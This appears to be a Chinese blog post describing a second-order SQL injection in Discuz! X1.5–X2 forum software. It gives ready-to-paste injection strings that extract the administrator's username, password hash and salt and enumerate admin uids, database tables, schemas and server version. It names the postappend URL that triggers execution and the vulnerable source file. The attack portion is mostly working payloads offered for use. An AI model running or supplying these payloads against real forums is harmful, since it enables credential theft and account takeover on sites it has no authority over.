当前位置: 首页 > news >正文

Discuz x1.5 – x2版本 二次注射

news 来源:原创 2024/5/19 2:51:23

a’,`subject`=(/*!select*/ concat(username,’|',password,’|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment=’

再给出一些语句。

‘,`subject`=(/*!select*/ group_concat(uid,’:') from pre_common_member where groupid=1),comment=’//查看管理用户
‘,`subject`=(/*!select*/ group_concat(uid,’:') from pre_common_member where groupid=2),comment=’//超级版主
‘,`subject`=(/*!select*/ group_concat(uid,’:') from pre_common_member where groupid=3),comment=’//超级版主
‘,`subject`=(/*!select*/ table_name from information_schema.tables where table_schema=0×0000 limit 0,1),comment=’//跑表
‘,`subject`=(/*!select*/ group_concat(schema_name) from information_schema.schemata),comment=’//获取所有库
‘,`subject`=(/*!select*/ concat(@@version,’:',user(),’:',database())),comment=’//版本信息

然后到回复补充那里随便补充一下,注入语句就被执行。
补充的地址:

forum.php?mod=misc&tid={tid}&action=postappend&pid={pid}

上面的语句就会把取得的内容写进回复主题返回。
漏洞文件:
source\module\forum\forum_misc.php


相关文章:

  • 网络风险评估与大致流程
  • Joomla Component com_bch LFI Vulnerability
  • IIS“页面无法显示”的故障及其解决方法
  • Linux服务器安全配置
  • sqlmap使用文档
  • MSSQL2008一句话启用xp_cmdshell
  • web脆弱性评估漏洞利用
  • Web Application Firewall Bypasses and PHP Exploit
  • 利用Acunetix WVS进行批量网站漏洞评估
  • F4ck Fckeditor 的精简总结
  • 渗透技巧笔记 - 落泪红尘
  • webshell下查找所有IIS站点配置(渗透时可能有点用)
  • udf手动导出提权
  • 远程包含
  • 命令行下的嗅探工具 - RawSniffer 1.2
  • conda常用的命令
  • extjs4学习之配置
  • iOS 颜色设置看我就够了
  • java8 Stream Pipelines 浅析
  • Just for fun——迅速写完快速排序
  • MD5加密原理解析及OC版原理实现
  • nginx 配置多 域名 + 多 https
  • Node项目之评分系统(二)- 数据库设计
  • Python_网络编程
  • React-生命周期杂记
  • VUE es6技巧写法(持续更新中~~~)
  • windows下使用nginx调试简介
  • 浮动相关
  • 技术攻略】php设计模式(一):简介及创建型模式
  • 排序算法学习笔记
  • 手写双向链表LinkedList的几个常用功能
  • ​ 全球云科技基础设施:亚马逊云科技的海外服务器网络如何演进
  • ​卜东波研究员:高观点下的少儿计算思维
  • # Maven错误Error executing Maven
  • #pragma once与条件编译
  • (07)Hive——窗口函数详解
  • (1)(1.13) SiK无线电高级配置(五)
  • (6)STL算法之转换
  • (android 地图实战开发)3 在地图上显示当前位置和自定义银行位置
  • (BFS)hdoj2377-Bus Pass
  • (C语言)球球大作战
  • (亲测)设​置​m​y​e​c​l​i​p​s​e​打​开​默​认​工​作​空​间...
  • (五) 一起学 Unix 环境高级编程 (APUE) 之 进程环境
  • (一)【Jmeter】JDK及Jmeter的安装部署及简单配置
  • .NET 8.0 发布到 IIS
  • .Net7 环境安装配置
  • @RunWith注解作用
  • @Valid和@NotNull字段校验使用
  • @WebService和@WebMethod注解的用法
  • [].shift.call( arguments ) 和 [].slice.call( arguments )
  • [C#]winform部署yolov5-onnx模型
  • [C#]使用PaddleInference图片旋转四种角度检测
  • [C++]C++入门--引用
  • [CF407E]k-d-sequence
  • [Electron]ipcMain.on和ipcMain.handle的区别